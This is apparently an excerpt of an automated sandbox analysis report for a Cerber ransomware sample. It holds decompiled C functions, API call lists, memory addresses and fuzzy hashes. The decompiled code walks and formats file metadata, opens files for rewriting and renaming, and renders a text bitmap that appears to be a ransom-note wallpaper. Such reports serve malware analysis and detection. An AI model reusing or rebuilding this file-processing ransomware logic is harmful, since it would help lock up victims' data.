                                                                                                                                                                                        							StrCatW( &_v1556, _t198);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000200;
                                                                                                                                                                                        						if((_t229 & 0x00000200) != 0) {
                                                                                                                                                                                        							_t195 = E0040591C(0x40d078, 2, 0x90281ace);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t195);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = 0x00000400 & _t229;
                                                                                                                                                                                        						if((0x00000400 & _t229) != 0) {
                                                                                                                                                                                        							_t192 = E0040591C(0x40d094, 3, 0x813b63a1);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t192);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000800;
                                                                                                                                                                                        						if((_t229 & 0x00000800) != 0) {
                                                                                                                                                                                        							_t189 = E0040591C(0x40d098, 2, 0xc1c7544c);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t189);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00001000;
                                                                                                                                                                                        						if((_t229 & 0x00001000) != 0) {
                                                                                                                                                                                        							_t186 = E0040591C(0x40d09c, 2, 0xb97bfa77);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t186);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t243 = 0x2000;
                                                                                                                                                                                        						__eflags = 0x00002000 & _t229;
                                                                                                                                                                                        						if((0x00002000 & _t229) != 0) {
                                                                                                                                                                                        							_t183 = E0040591C(0x40d0a0, 6, 0x7863e9f7);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t183);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00004000;
                                                                                                                                                                                        						if((_t229 & 0x00004000) != 0) {
                                                                                                                                                                                        							_t180 = E0040591C(0x40d0a8, 2, 0x9f4e4ac2);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t180);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00010000;
                                                                                                                                                                                        						if((_t229 & 0x00010000) != 0) {
                                                                                                                                                                                        							_t177 = E0040591C(0x40d0ac, 2, 0x1d2b18be);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t177);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t167 = lstrlenW( &_v1556);
                                                                                                                                                                                        						_push(0x32);
                                                                                                                                                                                        						 *((short*)(_t259 + 0x10a + _t167 * 2)) = 0;
                                                                                                                                                                                        						StrFormatByteSizeW(_v1788, _v1784,  &_v1660);
                                                                                                                                                                                        						_push( &_v1564);
                                                                                                                                                                                        						_push( &_v1668);
                                                                                                                                                                                        						_push( &_v1748);
                                                                                                                                                                                        						_push( &_v1708);
                                                                                                                                                                                        						_push(_v1816);
                                                                                                                                                                                        						_push(_v1808);
                                                                                                                                                                                        						_push(E0040591C(0x40d0b0, 0x56, 0x2c86bbcb));
                                                                                                                                                                                        						_push( *_a4);
                                                                                                                                                                                        						E00402B9B(_t229, _t235, _t243, _t252);
                                                                                                                                                                                        						_t257 = _t259 + 0x2c;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					__eflags =  *0x42f79e;
                                                                                                                                                                                        					if( *0x42f79e != 0) {
                                                                                                                                                                                        						__eflags = _t243 & _t229;
                                                                                                                                                                                        						if((_t243 & _t229) == 0) {
                                                                                                                                                                                        							_t229 = _t229 | _t243;
                                                                                                                                                                                        							__eflags = _t229;
                                                                                                                                                                                        							SetFileAttributesW(_v1808, _t229);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t244 = GetTickCount();
                                                                                                                                                                                        						_t138 = E00401A5B(_v1804, _t235, _v1808,  &_v532, _v1776, _v1792, _v1796);
                                                                                                                                                                                        						_t257 = _t257 + 0x14;
                                                                                                                                                                                        						__eflags = _t138;
                                                                                                                                                                                        						if(_t138 != 0) {
                                                                                                                                                                                        							_t140 = GetTickCount() - _t244;
                                                                                                                                                                                        							__eflags = _t140;
                                                                                                                                                                                        							_push(_t140);
                                                                                                                                                                                        							_push(_v1808);
                                                                                                                                                                                        							_push(_v1800);
                                                                                                                                                                                        							_push(E0040591C(0x40d108, 0x29, 0xbfade95f));
                                                                                                                                                                                        							_push( *_a4);
                                                                                                                                                                                        							E00402B9B(_t229, _t235, _t244, _t252);
                                                                                                                                                                                        							_t257 = _t257 + 0x20;
                                                                                                                                                                                        							E004090F6(0, _t235, _t244, _t252, __eflags,  &_v532);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t230 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        					_t131 = _v1804 + 0x17;
                                                                                                                                                                                        					__eflags = _t131;
                                                                                                                                                                                        					memset(_t131, 0, ( *0x42f7a4 & 0x0000ffff) + ( *0x42f7b4 & 0x0000ffff));
                                                                                                                                                                                        					_t257 = _t257 + 0xc;
                                                                                                                                                                                        					E00405463(_t252);
                                                                                                                                                                                        					E00405463(_v1808);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L50;
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x00402423
                                                                                                                                                                                        0x00401f18
                                                                                                                                                                                        0x00401f1c
                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                        0x00401f28
                                                                                                                                                                                        0x004023f5
                                                                                                                                                                                        0x00401f31
                                                                                                                                                                                        0x00401f39
                                                                                                                                                                                        0x00401f3b
                                                                                                                                                                                        0x00401f3d
                                                                                                                                                                                        0x00402412
                                                                                                                                                                                        0x00402416
                                                                                                                                                                                        0x0040241b
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040241b
                                                                                                                                                                                        0x00401f50
                                                                                                                                                                                        0x00401f52
                                                                                                                                                                                        0x00401f56
                                                                                                                                                                                        0x00401f58
                                                                                                                                                                                        0x0040240d
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040240d
                                                                                                                                                                                        0x00401f5e
                                                                                                                                                                                        0x00401f63
                                                                                                                                                                                        0x00401f6f
                                                                                                                                                                                        0x00401f73
                                                                                                                                                                                        0x00401f79
                                                                                                                                                                                        0x00401f80
                                                                                                                                                                                        0x00401f85
                                                                                                                                                                                        0x00401f86
                                                                                                                                                                                        0x00401f88
                                                                                                                                                                                        0x00402330
                                                                                                                                                                                        0x00401f8e
                                                                                                                                                                                        0x00401f8e
                                                                                                                                                                                        0x00401fa9
                                                                                                                                                                                        0x00401fb0
                                                                                                                                                                                        0x00401fb2
                                                                                                                                                                                        0x00401fb5
                                                                                                                                                                                        0x00401fbd
                                                                                                                                                                                        0x00401fc4
                                                                                                                                                                                        0x00401fc4
                                                                                                                                                                                        0x00401fcd
                                                                                                                                                                                        0x00401fd4
                                                                                                                                                                                        0x00401fe2
                                                                                                                                                                                        0x00401ff2
                                                                                                                                                                                        0x0040200e
                                                                                                                                                                                        0x00402025
                                                                                                                                                                                        0x00402033
                                                                                                                                                                                        0x00402043
                                                                                                                                                                                        0x00402048
                                                                                                                                                                                        0x0040204b
                                                                                                                                                                                        0x0040204e
                                                                                                                                                                                        0x0040205c
                                                                                                                                                                                        0x00402061
                                                                                                                                                                                        0x0040206d
                                                                                                                                                                                        0x0040206d
                                                                                                                                                                                        0x00402073
                                                                                                                                                                                        0x00402076
                                                                                                                                                                                        0x00402084
                                                                                                                                                                                        0x00402089
                                                                                                                                                                                        0x00402095
                                                                                                                                                                                        0x00402095
                                                                                                                                                                                        0x0040209b
                                                                                                                                                                                        0x0040209e
                                                                                                                                                                                        0x004020ac
                                                                                                                                                                                        0x004020b1
                                                                                                                                                                                        0x004020bd
                                                                                                                                                                                        0x004020bd
                                                                                                                                                                                        0x004020c3
                                                                                                                                                                                        0x004020c6
                                                                                                                                                                                        0x004020d4
                                                                                                                                                                                        0x004020d9
                                                                                                                                                                                        0x004020e5
                                                                                                                                                                                        0x004020e5
                                                                                                                                                                                        0x004020eb
                                                                                                                                                                                        0x004020ee
                                                                                                                                                                                        0x004020fc
                                                                                                                                                                                        0x00402101
                                                                                                                                                                                        0x0040210d
                                                                                                                                                                                        0x0040210d
                                                                                                                                                                                        0x00402113
                                                                                                                                                                                        0x00402116
                                                                                                                                                                                        0x00402124
                                                                                                                                                                                        0x00402129
                                                                                                                                                                                        0x00402135
                                                                                                                                                                                        0x00402135
                                                                                                                                                                                        0x0040213b
                                                                                                                                                                                        0x0040213d
                                                                                                                                                                                        0x0040214b
                                                                                                                                                                                        0x00402150
                                                                                                                                                                                        0x0040215c
                                                                                                                                                                                        0x0040215c
                                                                                                                                                                                        0x00402162
                                                                                                                                                                                        0x00402168
                                                                                                                                                                                        0x00402176
                                                                                                                                                                                        0x0040217b
                                                                                                                                                                                        0x00402187
                                                                                                                                                                                        0x00402187
                                                                                                                                                                                        0x0040218d
                                                                                                                                                                                        0x00402193
                                                                                                                                                                                        0x004021a1
                                                                                                                                                                                        0x004021a6
                                                                                                                                                                                        0x004021b2
                                                                                                                                                                                        0x004021b2
                                                                                                                                                                                        0x004021b8
                                                                                                                                                                                        0x004021ba
                                                                                                                                                                                        0x004021c8
                                                                                                                                                                                        0x004021cd
                                                                                                                                                                                        0x004021d9
                                                                                                                                                                                        0x004021d9
                                                                                                                                                                                        0x004021df
                                                                                                                                                                                        0x004021e5
                                                                                                                                                                                        0x004021f3
                                                                                                                                                                                        0x004021f8
                                                                                                                                                                                        0x00402204
                                                                                                                                                                                        0x00402204
                                                                                                                                                                                        0x0040220a
                                                                                                                                                                                        0x00402210
                                                                                                                                                                                        0x0040221e
                                                                                                                                                                                        0x00402223
                                                                                                                                                                                        0x0040222f
                                                                                                                                                                                        0x0040222f
                                                                                                                                                                                        0x00402235
                                                                                                                                                                                        0x0040223a
                                                                                                                                                                                        0x0040223c
                                                                                                                                                                                        0x0040224a
                                                                                                                                                                                        0x0040224f
                                                                                                                                                                                        0x0040225b
                                                                                                                                                                                        0x0040225b
                                                                                                                                                                                        0x00402261
                                                                                                                                                                                        0x00402267
                                                                                                                                                                                        0x00402275
                                                                                                                                                                                        0x0040227a
                                                                                                                                                                                        0x00402286
                                                                                                                                                                                        0x00402286
                                                                                                                                                                                        0x0040228c
                                                                                                                                                                                        0x00402292
                                                                                                                                                                                        0x004022a0
                                                                                                                                                                                        0x004022a5
                                                                                                                                                                                        0x004022b1
                                                                                                                                                                                        0x004022b1
                                                                                                                                                                                        0x004022bf
                                                                                                                                                                                        0x004022c7

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00401EC1
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(?,00000000,?), ref: 00401F73
                                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401FAA
                                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00401FBD
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401FC4
                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00401FE2
                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00401FF2
                                                                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000014), ref: 0040200E
                                                                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000008,?,00000000,?,00000014), ref: 00402025
                                                                                                                                                                                        • memset.NTDLL ref: 00402043
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000F), ref: 004023FD
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: FileTime$ErrorFormatLast$CloseCreateCurrentDateFreeHandleHeapLocalObjectSingleSizeSystemThreadWaitmemset
                                                                                                                                                                                        • String ID: 0jt
                                                                                                                                                                                        • API String ID: 1876243802-1607594887
                                                                                                                                                                                        • Opcode ID: 8f0a5e13c89349cc31a70bae2b028033ba65a7be3bd1cf822cbfa9e98d658092
                                                                                                                                                                                        • Instruction ID: 1b53b1905552076a97b2969ddcceb8c8da28030c795c23ffefdbb6d86413ff05
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f0a5e13c89349cc31a70bae2b028033ba65a7be3bd1cf822cbfa9e98d658092
                                                                                                                                                                                        • Instruction Fuzzy Hash: E6D1CA72544301ABD320AFA1DD49F9F77ACEF44704F04483AF684F61D2E77899198B9A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                        			E004086CF(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				CHAR* _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                        				struct HDC__* _v48;
                                                                                                                                                                                        				struct tagRECT _v64;
                                                                                                                                                                                        				struct tagRECT _v80;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				CHAR* _t70;
                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                        				void* _t76;
                                                                                                                                                                                        				int _t79;
                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                        				signed char _t126;
                                                                                                                                                                                        				signed char _t128;
                                                                                                                                                                                        				int _t132;
                                                                                                                                                                                        				void* _t137;
                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                        				signed int _t148;
                                                                                                                                                                                        				struct HDC__* _t150;
                                                                                                                                                                                        				struct HDC__* _t151;
                                                                                                                                                                                        				int _t157;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t63 = E004031AF(_a4, __eflags, E00405905(0x40d738, 9, 0xf223c378));
                                                                                                                                                                                        				_pop(_t137);
                                                                                                                                                                                        				_v12 = _t63;
                                                                                                                                                                                        				_t172 = _t63;
                                                                                                                                                                                        				if(_t63 != 0) {
                                                                                                                                                                                        					_push( &_v48);
                                                                                                                                                                                        					_t68 = E004031AF(_v12, _t172, E00405905(0x40d514, 4, 0x22a8cdeb));
                                                                                                                                                                                        					_t138 = _t137;
                                                                                                                                                                                        					_t70 = E004078F0(E004032B8(_t68, _t172), _t138, __edx);
                                                                                                                                                                                        					_v24 = _t70;
                                                                                                                                                                                        					if(_t70 != 0) {
                                                                                                                                                                                        						_t151 = GetDC(0);
                                                                                                                                                                                        						_v48 = _t151;
                                                                                                                                                                                        						if(_t151 != 0) {
                                                                                                                                                                                        							_t150 = CreateCompatibleDC(_t151);
                                                                                                                                                                                        							if(_t150 != 0) {
                                                                                                                                                                                        								_v16 = GetDeviceCaps(_t151, 8);
                                                                                                                                                                                        								_t75 = GetDeviceCaps(_t151, 0xa);
                                                                                                                                                                                        								_v20 = _t75;
                                                                                                                                                                                        								_t76 = CreateCompatibleBitmap(_t151, _v16, _t75);
                                                                                                                                                                                        								_v28 = _t76;
                                                                                                                                                                                        								_t176 = _t76;
                                                                                                                                                                                        								if(_t76 != 0) {
                                                                                                                                                                                        									_v44 = SelectObject(_t150, _t76);
                                                                                                                                                                                        									_t79 = GetDeviceCaps(_t151, 0x5a);
                                                                                                                                                                                        									_t84 = MulDiv(E00403253(E004031AF(_v12, _t176, E00405905( &E0040D744, 4, 0x149d4cf6)), _t176), _t79, 0x48);
                                                                                                                                                                                        									_t86 = CreateFontW( ~_t84, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
                                                                                                                                                                                        									_v40 = _t86;
                                                                                                                                                                                        									_t177 = _t86;
                                                                                                                                                                                        									if(_t86 != 0) {
                                                                                                                                                                                        										_v36 = SelectObject(_t150, _t86);
                                                                                                                                                                                        										SetBkColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d758, 0xa, 0xac908572)), _t177));
                                                                                                                                                                                        										SetTextColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d764, 5, 0xb1a3f726)), _t177));
                                                                                                                                                                                        										_t157 = _v16;
                                                                                                                                                                                        										_v64.left = 0;
                                                                                                                                                                                        										_v64.top = 0;
                                                                                                                                                                                        										_v64.right = _t157;
                                                                                                                                                                                        										_v64.bottom = _v20;
                                                                                                                                                                                        										FillRect(_t150,  &_v64, GetStockObject(2));
                                                                                                                                                                                        										_t105 = _v20 * _t157;
                                                                                                                                                                                        										_t143 = 0xa;
                                                                                                                                                                                        										_t106 = _t105 / _t143;
                                                                                                                                                                                        										_t148 = _t105 % _t143;
                                                                                                                                                                                        										if(_t106 > 0) {
                                                                                                                                                                                        											_v12 = _t106;
                                                                                                                                                                                        											do {
                                                                                                                                                                                        												_v32 = (E004063E1(0xff) & 0x000000ff) << 8;
                                                                                                                                                                                        												_t126 = E004063E1(0xff);
                                                                                                                                                                                        												_t128 = E004063E1(0xff);
                                                                                                                                                                                        												_t132 = E004063E1(_v64.bottom);
                                                                                                                                                                                        												SetPixel(_t150, E004063E1(_v64.right), _t132, _t128 & 0x000000ff | (_t126 & 0x000000ff | _v32) << 0x00000008);
                                                                                                                                                                                        												_t35 =  &_v12;
                                                                                                                                                                                        												 *_t35 = _v12 - 1;
                                                                                                                                                                                        											} while ( *_t35 != 0);
                                                                                                                                                                                        											_t157 = _v16;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_v80.bottom = _v20;
                                                                                                                                                                                        										_v80.left = 0;
                                                                                                                                                                                        										_v80.top = 0;
                                                                                                                                                                                        										_v80.right = _t157;
                                                                                                                                                                                        										DrawTextA(_t150, _v24, 0xffffffff,  &_v80, 0x411);
                                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                                        										asm("cdq");
                                                                                                                                                                                        										_v64.top = (_v64.bottom - _t148 >> 1) - (_v80.bottom - _t148 >> 1);
                                                                                                                                                                                        										DrawTextA(_t150, _v24, 0xffffffff,  &_v64, 0x11);
                                                                                                                                                                                        										_v5 = E00408485(_v80.bottom - _t148 >> 1, _v28, _a8, _a12, _a16);
                                                                                                                                                                                        										SelectObject(_t150, _v36);
                                                                                                                                                                                        										DeleteObject(_v40);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									SelectObject(_t150, _v44);
                                                                                                                                                                                        									DeleteObject(_v28);
                                                                                                                                                                                        									_t151 = _v48;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								DeleteDC(_t150);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							ReleaseDC(0, _t151);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}







































                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                          • Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
                                                                                                                                                                                          • Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00408745
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00408759
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040876C
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408778
                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408786
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00408799
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004087A7
                                                                                                                                                                                        • MulDiv.KERNEL32(00000000), ref: 004087D4
                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408802
                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00408815
                                                                                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00408845
                                                                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00408872
                                                                                                                                                                                        • GetStockObject.GDI32(00000002), ref: 0040888C
                                                                                                                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 00408898
                                                                                                                                                                                        • SetPixel.GDI32(00000000,00000000,00000000,?), ref: 004088FA
                                                                                                                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000411), ref: 00408926
                                                                                                                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000011), ref: 0040894F
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00408970
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408979
                                                                                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00408983
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0040898C
                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00408996
                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0040899E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$Select$CapsCreateDeleteDeviceText$ColorCompatibleDraw$BitmapFillFontPixelRectReleaseStocklstrcmpilstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3678731151-0
                                                                                                                                                                                        • Opcode ID: ab6a367ea6c4df976df6772465d329ac0f17774f2ac684a2dd7e95bacafdd01a
                                                                                                                                                                                        • Instruction ID: ef1943a7f34fee3139141099a9e207c1e29f1f4870d14a52305c2a9e29fd8a02
                                                                                                                                                                                        • Opcode Fuzzy Hash: ab6a367ea6c4df976df6772465d329ac0f17774f2ac684a2dd7e95bacafdd01a
                                                                                                                                                                                        • Instruction Fuzzy Hash: 738182B1D00218BFDB11AFA5DD459AE7BB8EF48715F01403AF905F72D1DA3849058B6A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                        			E00401A5B(void* __eax, long __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, void* _a16, intOrPtr _a20) {
                                                                                                                                                                                        				signed char _v9;
                                                                                                                                                                                        				char _v10;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				long _v24;
                                                                                                                                                                                        				signed int* _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                        				struct _OVERLAPPED* _v40;
                                                                                                                                                                                        				long _v44;
                                                                                                                                                                                        				long _v48;
                                                                                                                                                                                        				void* _v52;
                                                                                                                                                                                        				void* _v56;
                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                        				signed int _v64;
                                                                                                                                                                                        				intOrPtr _v68;
                                                                                                                                                                                        				signed short _v72;
                                                                                                                                                                                        				struct _FILETIME _v80;
                                                                                                                                                                                        				struct _FILETIME _v88;
                                                                                                                                                                                        				struct _FILETIME _v96;
                                                                                                                                                                                        				signed int _v100;
                                                                                                                                                                                        				char _v126;
                                                                                                                                                                                        				char _v128;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t141;
                                                                                                                                                                                        				void* _t156;
                                                                                                                                                                                        				intOrPtr _t160;
                                                                                                                                                                                        				struct _OVERLAPPED** _t161;
                                                                                                                                                                                        				long _t169;
                                                                                                                                                                                        				short _t173;
                                                                                                                                                                                        				long _t191;
                                                                                                                                                                                        				void* _t193;
                                                                                                                                                                                        				signed int _t200;
                                                                                                                                                                                        				void* _t223;
                                                                                                                                                                                        				void* _t225;
                                                                                                                                                                                        				void* _t226;
                                                                                                                                                                                        				void* _t228;
                                                                                                                                                                                        				signed short _t229;
                                                                                                                                                                                        				intOrPtr* _t238;
                                                                                                                                                                                        				long _t242;
                                                                                                                                                                                        				long _t243;
                                                                                                                                                                                        				long _t247;
                                                                                                                                                                                        				signed short _t251;
                                                                                                                                                                                        				void* _t254;
                                                                                                                                                                                        				void* _t256;
                                                                                                                                                                                        				struct _OVERLAPPED* _t259;
                                                                                                                                                                                        				void* _t265;
                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                        				void* _t276;
                                                                                                                                                                                        				void* _t277;
                                                                                                                                                                                        				void* _t281;
                                                                                                                                                                                        				void* _t283;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t243 = __edx;
                                                                                                                                                                                        				_t259 = 0;
                                                                                                                                                                                        				_t225 = __eax;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v10 = 0;
                                                                                                                                                                                        				_t141 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0);
                                                                                                                                                                                        				_v20 = _t141;
                                                                                                                                                                                        				if(_t141 == 0xffffffff) {
                                                                                                                                                                                        					L31:
                                                                                                                                                                                        					return _v10;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t227 =  &_v72;
                                                                                                                                                                                        				 *0x40f214(_t141,  &_v72);
                                                                                                                                                                                        				_t276 = _v68 -  *0x42f7ac; // 0x0
                                                                                                                                                                                        				if(_t276 < 0) {
                                                                                                                                                                                        					L27:
                                                                                                                                                                                        					CloseHandle(_v20);
                                                                                                                                                                                        					if(_v16 != _t259) {
                                                                                                                                                                                        						if(_v10 != 0) {
                                                                                                                                                                                        							_v10 = MoveFileW(_a4, _v16) != 0;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_v16);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L31;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t276 > 0) {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					_push(8);
                                                                                                                                                                                        					_v28 = E004053BD(_t227);
                                                                                                                                                                                        					_v128 = 0;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosw");
                                                                                                                                                                                        					E00405D99(_t227, _t243,  &_v128, 0xb, 0xf);
                                                                                                                                                                                        					_push(0x42fe98);
                                                                                                                                                                                        					_push( &_v128);
                                                                                                                                                                                        					_push(_a8);
                                                                                                                                                                                        					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
                                                                                                                                                                                        					_push( &_v16);
                                                                                                                                                                                        					E00405B0C(_t225, _t227,  &_v126, _t259, _t277);
                                                                                                                                                                                        					_t268 = _t265 + 0x2c;
                                                                                                                                                                                        					_t156 = E00404EA5(_v16);
                                                                                                                                                                                        					_pop(_t228);
                                                                                                                                                                                        					_t278 = _t156;
                                                                                                                                                                                        					if(_t156 == 0) {
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						_t229 = _v72;
                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                        						_v64 =  *0x42f7b4 & 0x0000ffff;
                                                                                                                                                                                        						_v60 = _t243;
                                                                                                                                                                                        						_v96.dwLowDateTime = _t229 - 0x42f7c0->LowPart;
                                                                                                                                                                                        						_t160 = _v68;
                                                                                                                                                                                        						asm("sbb edx, [0x42f7c4]");
